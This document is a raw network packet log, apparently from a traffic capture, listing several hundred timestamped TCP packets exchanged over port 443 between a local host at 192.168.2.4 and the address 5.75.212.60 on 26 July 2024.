Jul 26, 2024 18:56:16.125029087 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.125091076 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.125097990 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.125135899 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.131243944 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.131284952 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.131336927 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.131346941 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.131375074 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.131391048 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.138412952 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.138454914 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.138499022 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.138504028 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.138535023 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.138552904 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.144202948 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.144243956 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.144315958 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.144320965 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.144349098 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.144366980 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.148873091 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.148894072 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.148958921 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.148967028 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.149007082 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.153414965 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.153443098 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.153500080 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.153507948 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.153546095 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.157588005 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.157608986 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.157674074 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.157684088 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.157726049 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.161266088 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.161283970 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.161345005 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.161350965 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.161391973 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.166110039 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.166162968 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.166186094 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.166191101 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.166222095 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.166240931 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.167620897 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.167673111 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.167691946 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.167696953 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.167726994 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.167747021 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.170751095 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.170794010 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.170828104 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.170831919 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.170859098 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.170876980 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.173799992 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.173819065 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.173867941 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.173876047 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.173914909 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.178694963 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.178735971 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.178776026 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.178787947 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.178801060 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.178826094 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.182756901 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.182775974 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.182823896 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.182836056 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.182847977 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.182879925 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.185497046 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.185518026 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.185569048 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.185578108 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.185616970 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.189503908 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.189522982 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.189579010 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.189594984 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.189608097 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.189630032 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.193046093 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.193092108 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.193121910 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.193134069 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.193152905 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.193173885 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.195738077 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.195756912 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.195813894 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.195821047 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.195861101 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.198652029 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.198673010 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.198718071 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.198724985 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.198738098 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.198760033 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.201865911 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.201889038 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.201931953 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.201939106 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.201951981 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.201976061 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.205008984 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.205044985 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.205070972 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.205084085 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.205096960 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.205116987 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.207741022 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.207783937 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.207818031 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.207832098 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.207845926 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.207870007 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.210203886 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.210228920 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.210294008 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.210303068 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.210349083 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.212682009 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.212704897 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.212742090 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.212747097 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.212764978 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.212781906 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.214678049 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.214699984 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.214735985 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.214744091 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.214760065 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.214778900 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.216984034 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.217008114 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.217044115 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.217048883 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.217066050 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.217084885 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.219058037 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.219099998 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.219131947 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.219136000 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.219156027 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.219186068 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.220830917 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.220873117 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.220913887 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.220918894 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.220947027 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.220966101 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.223488092 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.223510981 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.223567009 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.223571062 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.223606110 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.223624945 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.224586964 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.224607944 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.224706888 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.224714041 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.224777937 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.226092100 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.226135969 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.226176977 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.226181984 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.226207018 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.226221085 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.236109972 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.236157894 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.236190081 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.236196041 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.236226082 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.236248016 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.264504910 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.264534950 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.264653921 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.264666080 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.264727116 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.266274929 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.266326904 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.266377926 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.266383886 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.266417027 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.266427040 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.270020962 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.270064116 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.270096064 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.270102978 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.270117044 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.270144939 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.318607092 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.318667889 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.318758011 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.318770885 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.318804026 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.318804026 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.320250034 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.320296049 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.320341110 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.320347071 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.320369959 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.320394039 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.322674990 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.322695971 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.322760105 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.322767973 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.322813034 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.325531960 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.325557947 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.325597048 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.325602055 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.325625896 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.325644016 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.326931000 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.326953888 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.326993942 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.326998949 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.327027082 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.327040911 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.350230932 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.350251913 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.350321054 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.350334883 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.350352049 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.350375891 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.352456093 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.352474928 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.352541924 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.352547884 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.352576017 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.352596045 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.356125116 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.356168985 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.356380939 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.356390953 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.356440067 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.375451088 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.375495911 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.375596046 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.375612020 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.375632048 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.375663042 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.404069901 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.404092073 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.404211044 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.404221058 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.404263020 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.407239914 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.407269955 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.407444000 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.407450914 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.407507896 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.409575939 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.409595966 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.409655094 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.409662008 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.409678936 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.409703016 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.420046091 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.420068026 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.420139074 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.420145988 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.420160055 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.420185089 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.440720081 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.440766096 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.440929890 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.440937042 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.440985918 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.442912102 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.442959070 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.442996979 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.443002939 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.443032026 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.443048954 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.444283962 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.444348097 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.444371939 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.444377899 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.444410086 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.444428921 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.466022968 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.466099977 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.466136932 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.466169119 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.466186047 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.466217041 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.510488987 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.510569096 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.510617971 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.510639906 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.510672092 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.510684013 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.512733936 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.512778997 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.512866020 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.512872934 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.512913942 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.512913942 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.514821053 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.514869928 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.515023947 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.515032053 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.515078068 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.519270897 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.519313097 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.519356966 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.519362926 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.519392014 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.519407034 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.549827099 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.549899101 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.549982071 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.549997091 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.550014973 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.550045013 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.557280064 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.557324886 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.557375908 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.557394981 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.557415009 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.557431936 CEST	49737	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:16.563210964 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.563258886 CEST	443	49737	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:16.563292980 CEST	49737	443	192.168.2.4	5.75.212.60
